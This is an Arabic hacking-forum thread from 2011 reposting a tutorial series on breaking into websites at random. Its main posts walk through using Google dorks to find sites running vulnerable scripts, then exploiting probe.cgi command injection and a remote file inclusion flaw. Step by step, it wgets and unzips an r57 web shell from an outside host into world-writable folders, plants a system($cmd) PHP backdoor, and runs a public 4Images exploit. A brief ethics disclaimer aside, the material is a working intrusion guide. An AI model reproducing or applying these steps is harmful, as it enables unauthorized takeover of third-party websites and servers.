لينوس تورفالدس و هو فنلندي يقوم بكتابة التعليقات على الكود الذي يكتبه بالانجليزية. قدرته على التحدث بالانجليزية لعبت دورا هاماً في قدرته على العمل مع المجتمع الواسع من المطورين على الانترنت لتطوير اللينكس. و هو مثال جدير أن يحتذى به.

والآن بعد أن تعرفنا على الهاكر كل ما له وما عليه

نبدأ فى تعليم اختراق المواقع :
فيه نوعين من الاختراق 1- اختراق عشوائى 2- اختراق مخطط مسبقا ( موقع بعينه يعنى )
1- الاختراق العشوائى
نبذة مختصرة : انت بتدخل على أحد مواقع السيكيورتى وتشوف أحدث الثغرات وتروح لموقع بحث جوجل أو التافيستا بتبحث عن المواقع اللى فيها الثغرة وتطبق الثغرة عليه

الى اللقاء حتى الدرس الثانى سنشرح فيه أنواع الثغرات وكيفية البحث عن المواقع المصابة وتطبيق الثغرة ورفع الشل ؟؟ ايه شل ده ياعم ؟؟ على العموم هنشرح الشل بأوامره وازاى تسيطر على الموقع وتبقى رووت
SALAM
مع تحياتى srab_hacker.ops أرجو عدم نقل الدرس بدون ذكر الحقوق لصاحب الموضوع الأصلى
التوقيع

لا تحوال التلغيم فأن لغمت سوف يتم دعسك ونسيانك مع التاريخ
:love: شبكةالعناكب الأحترافية :love:
للتواصل + تبادل الخبرات + التعليم
كود:
sy7@live.de

الحمد لله على اني مسلم ولو لم اكن مسلم لأسلمت وقلت
لا اله الا الله وحده لا شريك له واشهد ان محمد عبده ورسوله

 


التعديل الأخير تم بواسطة despond ; 03-18-2011 الساعة 05:14 PM.

   

رد مع اقتباس
قديم 03-18-2011, 05:31 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية despond
 

 

 
إحصائية العضو







despond غير متواجد حالياً

إرسال رسالة عبر MSN إلى despond

 

 

إحصائية الترشيح

عدد النقاط : 10
despond is on a distinguished road

افتراضي


سلسلة تعلم اختراق المواقع من البداية الى الاحتراف

الدرس الثانى

أحب أن أنوه أن كل الدروس مجهود شخصى ولا يجب نقلها خارج المنتدى الا بذكر اسم صاحبها

والهـــدف من هـــذا الموضوع هو :::
العلـــــم , ===> والاستفادة ... ,,, وليـس مجرد تعليــم الاختراق , وتدمير المواقع ...
لأنه !!! إذا كان هدفك من تعلم الاختراق ... هو ::: تدمير المواقع , وتغير الصفحات الرئيسية للمواقع...
فتأكد أنك مازلت طفل ,,, ولا تستحق لقب ((( HaCkEr )))...
فيكيفك إحساس بالفخر عندما تقوم باختراق موقع أو سيرفر أن ترسل رسـالة إلي الأدمن ...
تبلغه بوجود ثغره فى موقعه ... وتطلب منه أن يقوم بترقيع هذه الثغرة...


srab_hacker.ops
لقد بدأنا فى الدرس السابق الحديث عن الاختراق العشوائى :

أولا يجب أن أذكر أن الاختراق العشوائى لا يثبت أنك هاكر فهو مجرد وسيلة سهلة لاختراق المواقع من دون تعب ( تلعب الصدفة دورا كبيرا ) 0

آلية الاختراق العشوائى :

أولا تقوم بالدخول على أحد مواقع السيكيورتى( سنقوم بشرح كيفية العثور على أحدث الثغرات من مواقع السيكيورتى فى الدرس القادم ) وتقوم بمعرفة أحدث الثغرات ثم نقوم بالدخول الى موقع بحث وطبعا على رأس هذه المواقع موقع جوجل خادم الهاكرز أو كما يطلقون Hackers Servant وتبحث عن المواقع المصابة بالثغرة وتطبقها وتملك الموقع ( الموضوع سهل ) 0 يالا نشوف ازاى 0 جميع الحقوق محفوظة ل SUPER TEST
أولا : قبل ما ندخل على موقع السيكيورتى لازم نعرف أنواع الثغرات 0 لأننا لو دخلنا كده وشفنا الثغرات مش هنعرف حاجة ؟؟؟ صح !!! نبتدى نعرف أنواع الثغرات

النوع الأول ثغرات Remote command exucetion
ده نوع بيمكنك من تطبيق أوامر على الموقع مباشرة 0 انت هتلخبطنا ليه ؟؟؟ يعنى ايه تطبيق أوامر على الموقع أصلا !!! ولا تزعل يا عم نشرح دى الأول وبعدين نكمل شرح الثغرات انت بتدخل على رابط الموقع www.victim.com مثلا ده الموقع المصاب بالثغرة الموقع ده فيه ملف اسمه 1.php مثلا الملف ده ههوه اللى فيه الثغرة يعنى الرابط هيبقى كده www.victim.com/1.php والثغرة موجودة فى امر root الموجود فى الملف نقوم بقه احنا نكتب فى المتصفح الشكل النهائى كده www.victim.com/1.php?root=(.......) وتكتب مكان النقط الأمر اللى هتطبقه ودى بتكون أوامر لينكس 0 طيب دلوقتى فهمنا يعنى ايه نطبق أوامر 0 ايه بقى الأوامر دى ؟؟؟؟

الأوامر دى أوامر لينكس زى أوامر الدوس كده 0 طبعا انت تقدر تطبق أوامر من على الدوس على الويندوز 0 يعنى تقدر تحذف ملف 0 وتقدر تنقل ملف 0 ده بقى نفس النظام بس الأوامر مش أوامر دوس أوامر لينكس 0 أفتكر الأمر وضح دلوقتى 0 ( يعنى شويه بس لسا مش فاهم أوى ) 0
اوكى ركز معايا 0 ندى مثال لأمر بسيط مع العلم أنه سوف يتم شرح جميع الأوامر فى درس منفصل 0 نفرض احنا عايزين نشوف كل المجلدات اللى موجوده فى السيرفر نكتب الأمر ls -al 0 هيطلع لنا كل المجلدات اللى على الموقع هندور على الملف اللى فيه الباسورد ونسحبه وناخد الباسورد 0 متستعجلش كل ده هنشرحه بالتفصيل 0

دلوقتى خلينا فى موضوعنا 0 هو احنا كنا بنتكلم عن ايه 0 اه افتكرت نكمل 0

طيب خلينا نجيب ثغره ونطبق ... وعنوان الثغرة كده ...مثــلاً ...

Probe.cgi Remote Command Execution
يعني بملف Probe.cgi فيه ثغره رموت كومند Remote Command حلو ...طيب خلونا نشوف الاكسبلويت
( السورس بتاع الثغرة .... ) ده اللى كان مكتوب فى موقع السيكيورتى

اقتباس
Authors ....... spher3 (spher3 at fatalimpulse dot net)
Date .......... 04-07-2005
Product ....... probe.cgi
Type .......... Remote Command Execution


o Info:
================
That script is used to open file '.dat'.

o Vulnerable Code:
================
..
23 [...]
24 $old = $query->param('olddat');
25 [...]
..
..
34 [...]
35 open (VF, "$olddat");
36 [...]
..

(24) At this line, the cgi param 'olddat' is associated to one database.
This variable isn't checked by anyone matching, so you can open
all file that you want. (35) At this line the script open the file
that you had chosen. With pipe `|`
is possible to execute arbitrary code on the shell.


o Proof of concept:
================

http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id|
uid=99(www) gid=99(www)


ده اللى لقيناه فى صفحة الثغرة فى موقع السيكيورتى
لو قرينا فوق موضح لك الملف ونوع الثغرة ,,,,, طيب احنا عوزين الاستثمار ... يعنى ازاى نستغل الثغرة دى

استثمارها هنا بالسطر ده ...
http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id|
the-vuln.site.org.<<===الموقع المستهدف وهو افتراضي يعنى انت بتحط الموقع المصاب بالثغرة هنا

cgi-bin<<===مجلد الـ cgi-bin

probe.cgi<<===الملف المصاب

olddat<<===مكان الاصابه داخل الملف ومش شرط نفس الاسم ممكن يتغير
===============

طيب ممكن نعرف كيفية عملها اوكي

اولاً ... ندخل على جوجل ونبحث بالطريقة دى
اقتباس
inurl:probe.cgi


كده هيجيب لنا اى موقع فيه الملف ده ( المصاب ) 0

أو تبحث بأى طرية تحب

لنفرض اننا حصلنا علي موقع
http://www./???.com/cgi.bin/probe.cgi?grid=ThaiGrid
مكان الاصابة اتغير هنا
كويس أول حاجه نضع
|id|
ده أمر بيبين صلاحياتك على السيرفر يعنى ايه اللى ممكن تعمله من الثغرة دى
بيطلع بالشكل
www.???.com/cgi.bin/probe.cgi?grid=|id|
واضغط انتر بيظهر لك مثلا كده
uid=99(www) gid=99(www)
هذه صفتك ( صلاحيتك ) بالسيرفر

طيب عايزين نعرف مكاننا على السيرفر
ضع مكان الـ id
pwd
أمر يبين مكانك على السيرفر على العموم احنا لسه هنشرح الأوامر دى كلها بالتفصيل ان شاء الله ان عشنا
www.???.com/cgi.bin/probe.cgi?grid=|pwd|
بيطلع معك مثلا...
/home/.???/cgi.bin
طيب دلوقتى عرفنا احنا فين نشوف مسموح لينا نرفع ملف على الموقع ولا لأ؟
ضع مكان الـ id
which wget
بالشكل,,,,,,,,,
www.???.com/cgi.bin/probe.cgi?grid=|which wget|
اداة wget أمر سحب ملف على الموقع يعنى ترفع ملف على الموقع
إذا ظهر لك كدا ...
/؟؟؟/؟؟؟/wget
وعلامات الاستفهام متغيرة يعني أهم شئ wget تظهر ... فإذا ظهرت ... فاعرف إن وضعك زي الـفــل...

يعني مسموح لك ترفع ملف ... انبسط ياعم ...

طيب عايزين نعرف التصاريح : permits للمجلدات والملفات عشان نشوف فين المسوح لينا بالرفع ( فيه مجلدات فى الموقع لك الحق انك ترفع فيها ملفات وفيه ملفات مش مسموح لك ترفع عليها )

لو ترجع احنا قلنا مكاننا فين هنا
/home/.???/cgi.bin
طيب احنا عايزين نخرج من مجلد cgi.bin للديكويتري ( المجلد ) الرئيسي ... حلو !

نضع مكان الـ id
cd /home/.???/;pwd
يعني بيكون بالشكل
www.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;pwd|
الآن بيرجعنا إلى ...home/.???/
حلو الآن ... عايزين نشوف المجلدات والملفات و التصريحات لأن التصريحات دى اللى هتعرفنا المجلدات اللى لك حق الرفع عليها بالأمر ...
ls -al
بيطلع كدا ::::::
www.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;ls%20-al|
بتظهر لك ملفات ومجلدات الموقع وأمامهم تصريحاتهم...

إنت ابحث عن المجلد اللي له التصريح
drwxrwxrwx والتصريح ده اسمه 777
لنفرض انك حصلت أمام مجلد الصور أو uploads تصريح ( drwxrwxrwx = 777 )

أولا ... لازم تخش عليه ... تعمل
cd home/.???/uploads/;pwd
www.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/;pwd|
حلو بيكون وضعك بالشكل
home/.???/uploads/
يعني داخل مجلد uploads
الآن كل ما عليك رفع الشل ( هنشرح الشل بالتفصيل بعدين ) ان شاء الله ... طبعا لك شل مرفوع بأحد المواقع ... يعني نفترض رابط شيلك Your Shell
www.XXX.com/r57shell.zip
وعايز ترفعه على الموقع اللي اخترقته ... بيكون بالشكل ده ......
www.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/wget www.XXX.com/r57shell.zip*|
واعطيه انتر Enter بيظهر لك :::
r57shell.zip
طيب عايزين نفك الضغط عنه بالأمر unzip
www.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/unzip r57shell.zip*|
وديلو إنتر Enter بيطلع معك :::
r57shell.php
وألف مبروك خش وافتحه بالمتصفح وتمتع وبيكون الرابط
www.???.com/uploads/r57shell.php
( سأشرح ... كيف تتعامل مع الشل Shell , وكيف تستخدم أوامره , وما الذي تفعله بعد رفع الـ Shell ... لاحقاً )
مع تحياتى SUPER TEST

ننتقل للقسم الثاني وهي ثغرات Remote File Inclusion
الثغرات المسماه Remote File Inclusion شبيهه بعمل Remote Command Execution

بس الفرق يلزم كود لرفعه لموقعك يعنى مش هتقدر تنفذ الأمر مباشرة بس هتنفذه عن طريق ملف تانى انت تكون رافعه على موقع تانى ومن ثم تأخذ رابطه وتستخدمه لاستثمار أو الهجوم

خلونا نأخذ مثال للتوضيح ... ولنأخذ هذه الثغرة ...مثال :::
ده مثلا استغلال الثغرة :
http://www.target.net/index.php?mode.../evilcode?&cmd
لو تلاحظ بالاستغلال
http://evilcode?&cmd
http://evilcode = موقعك

?&cmd = كود مرفوع بموقعك :( ملف يعنى )
**********
افتح النوت باد Notepad وادخل هذا الكود واحفظها باسم cmd.gif

اقتباس
<?

اقتباس
system($cmd);
?>

*/


**********
أنا رافعه على موقعي
http://members.lycos.co.uk/satonline/cmd.gif?&cmd=id
وعند الاستغلال
http://www.target.net/index.php?mode...md.gif?&cmd=id
الـ id بالآخر تضع مكانها أوامر اللينكس... ( كما شرحت فى الأعلي )
والفرق بين Remote Command Execution و Remote File Inclusion
أن Remote File Inclusion فيها كود ترفعه على موقعك وتستخدم الأوامر مكان الآي دي id ((رابط موقعك مع الـ id ))

و Remote Command Execution تستخدم أوامر اللينكس على طول بدون كود مرفوع (( الـ id فقط ))


النوع الخامس ثغرات PhP


*** ^^^ طـريقة استغـلال ثغـرات الـ php مـع التطبيق ^^^ ***
<<<<>>>> ::: بسم الله نبدأ::: <<<<>>>>


ندخل بالموضوع بدون مقدمات

طيب اول شي كيف تعرف انها php ?

هتلاقى اول الكـود بتاع الثغـره مكتـوب كده

<?php
طيـب آستغلال الثغـرات دى ازاى ؟؟؟؟
تنسخها فى النوت باد وتحفظها بامتداد php وتـرفعه على موقـع , مثـل ليكوس و غيره ,

طيـب ناخـذ ثغرة
4Images <= 1.7.1 remote commands execution through arbitrary local
الثــغره في البوم الصـور 4Images الاصــدار : 1.7.1

طيــب هــذا سورس الثغــره اللي نـزل في مـواقع السكـيورتي ,

http://www.milw0rm.com/exploits/1533

زي ماشفنـا في بـداية الكـود <?php اوكـى ,
دلوقتى احـفظ الثغـره في جهـازك وانا سميتها كده 4images.php

لاحظ الامتداد الي حطـيته php وروح ارفــعها على موقع يقبل الامتــداد ده , وبعدين افتحها

http://www.xxxx.com/xxxxx/4images.php
حيث xxxxx رابط موقعك
بص ..... بعد ما تفتحها

طبـعا الطـلبات واضـحه ,,

أول خيــار : رابــط المـوقع واحط مثــال هو , http://www.sitename.com/

ثــاني خيآر : اســم المجلد ع المـوٍٍقـع , وحــاطط مثـال هو /4images/ or just او غيـره ...

ثـالث خيـار : ( أمــر لينكس او ويندوز ) وحــاطط مثال هـو
specify a command ("cat config.php" ,

وأوامـر لينكس مهــمه جـدا والكل لازم يعـرفها او يأخذ نبذه بسيـطه عنـها عشـان يعرف يتعـامل مع النظام ده وهأشرحها بالتفصيل ان شاء الله ,

طبعا احنا اخذنا الخيارات المهمه < اول ثلاث خيارات الي حـاطط عليــها * نجمه ( فى الصور التالية ) > ,

طيب بنطـبق على مـوقع مصـاب ونــشوف.
زي ماشفنا في الصـوره كتـبت الامـر ls -l وهو لـعرض الملفات مـع تصاريحها

ودى هي المـلفات دلوقتى نشوفلنا مجلد تصريحه 777 فاكرين يعنى ايه ومجلد data تصريحه 777 زي مانشـوف في الصوره

بس الملف الي احنا علي تصريحه 777 اكتـب بدال الامر ls -l الامر هذا which wget وبيقــولك !/usr/bin/wget

يعنــي تقــدر تـرفع طيب تمـام دلوقتى نرفع لنـا شل ,

زي ماشفــناء في الصـوره كتـبت كـدا

wget http://www.web4new.com/gallery/r57shell.zip


wget آ مــر الرفع والرابــط رآبـط الشل , وآظغــط ( GO )


طـيب دلوقتى عشــان تتأكد انه اترفع ... روح واكتـب الامر ls -l وبتـشوفه مع المـلفات ,

كـل شي تمام طيب دلوقتى تفـك الظغـط عن الشـل ,

unzip = امـر فك الظـغط

r57shell.zip = المـلف الي رفعناه ,

ولاحـظ الصوره بعد ماظغطنــا go , فـك الظغـط , وطـلع الملف r57shell.php ,

ودى صـوره توضــح ..

خــلاص دلوقتى كل شي تــمام تشــوف مكانك فين على السيرفر

pwd : امـر يحدد مكانك على السيرفر ,

زي ماشفـنا في الصــوره عطانا المكان اللي احنـاء فيه ,

/home/mubailes/public_html/main

فــي المجلد الرئيسي بتاع الموقع في مجلد main يعني الشل هنا

www.xxxx.com/main/r57shell.php
XXXX = رابط الموقع المصاب
ودى الصــوره بعد دخــولنا على الشــل ,


وبكــدا ان شاء الله نكون عـرفنا ازاى نستغـل ثغـرات الـ php واخذنـا الثغـره دى كمثــال ,
واكيــد كل ثغـره يفرق استثمارها عن الثانية وان شاء الله يكون الـدرس واضـح .....

الى اللقاء فى الدرس الثالث ان شاء الله
SUPER TEST
أحب أن أنوه أن كل الدروس مجهود شخصى ولا يجب نقلعا خارج المنتدى الا بذكر اسم صاحبها
جميع الحقوق محفوظة لصاحب الموضوع srab_hacker.ops:coool:
التوقيع

لا تحوال التلغيم فأن لغمت سوف يتم دعسك ونسيانك مع التاريخ
:love: شبكةالعناكب الأحترافية :love:
للتواصل + تبادل الخبرات + التعليم
كود:
sy7@live.de

الحمد لله على اني مسلم ولو لم اكن مسلم لأسلمت وقلت
لا اله الا الله وحده لا شريك له واشهد ان محمد عبده ورسوله

 


التعديل الأخير تم بواسطة despond ; 03-18-2011 الساعة 05:39 PM.

   

رد مع اقتباس
قديم 03-18-2011, 05:39 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية despond
 

 

 
إحصائية العضو







despond غير متواجد حالياً

إرسال رسالة عبر MSN إلى despond

 

 

إحصائية الترشيح

عدد النقاط : 10
despond is on a distinguished road

افتراضي


ارجو ان اكون قد افدت وشكرا لكم
التوقيع

لا تحوال التلغيم فأن لغمت سوف يتم دعسك ونسيانك مع التاريخ
:love: شبكةالعناكب الأحترافية :love:
للتواصل + تبادل الخبرات + التعليم
كود:
sy7@live.de

الحمد لله على اني مسلم ولو لم اكن مسلم لأسلمت وقلت
لا اله الا الله وحده لا شريك له واشهد ان محمد عبده ورسوله

 

   

رد مع اقتباس
قديم 03-18-2011, 08:31 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
الصورة الرمزية khiero
 

 

 
إحصائية العضو





khiero غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
khiero is on a distinguished road

افتراضي


ماشاء الله عليك
اخي والدرس طويل لكن مفيد
انا ارجو منك تقوم بدورة لهذه الدروس مع فهرسها حتى تكون منظمة
وانت كلما قمت بعمل موضوع قم بغلقه حتى لا تكثر الردود
ولكل درس استفسار في حالة وجود الصعوبات
ايش رأيك ؟

   

رد مع اقتباس
قديم 03-18-2011, 08:55 PM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
الصورة الرمزية despond
 

 

 
إحصائية العضو







despond غير متواجد حالياً

إرسال رسالة عبر MSN إلى despond

 

 

إحصائية الترشيح

عدد النقاط : 10
despond is on a distinguished road

افتراضي


طيب اخي انا عرضت على الأدارة بصراحة بقسم الأأقتراحات انو يسمحلوي بأنشاء دورة كاملة عن اختراق المواقع والمنتديات ولاكن المشكلة حتا الأن لم يأتيني رد

بازن الله ان سمحو لي
سوف اطلب ةمساعدة احدة الأعضاء ولاكن سوف اختار من له الخبرة الكاملة او الجزئية في اختراق المواقع والمنتديات

التوقيع

لا تحوال التلغيم فأن لغمت سوف يتم دعسك ونسيانك مع التاريخ
:love: شبكةالعناكب الأحترافية :love:
للتواصل + تبادل الخبرات + التعليم
كود:
sy7@live.de

الحمد لله على اني مسلم ولو لم اكن مسلم لأسلمت وقلت
لا اله الا الله وحده لا شريك له واشهد ان محمد عبده ورسوله

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 07:48 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0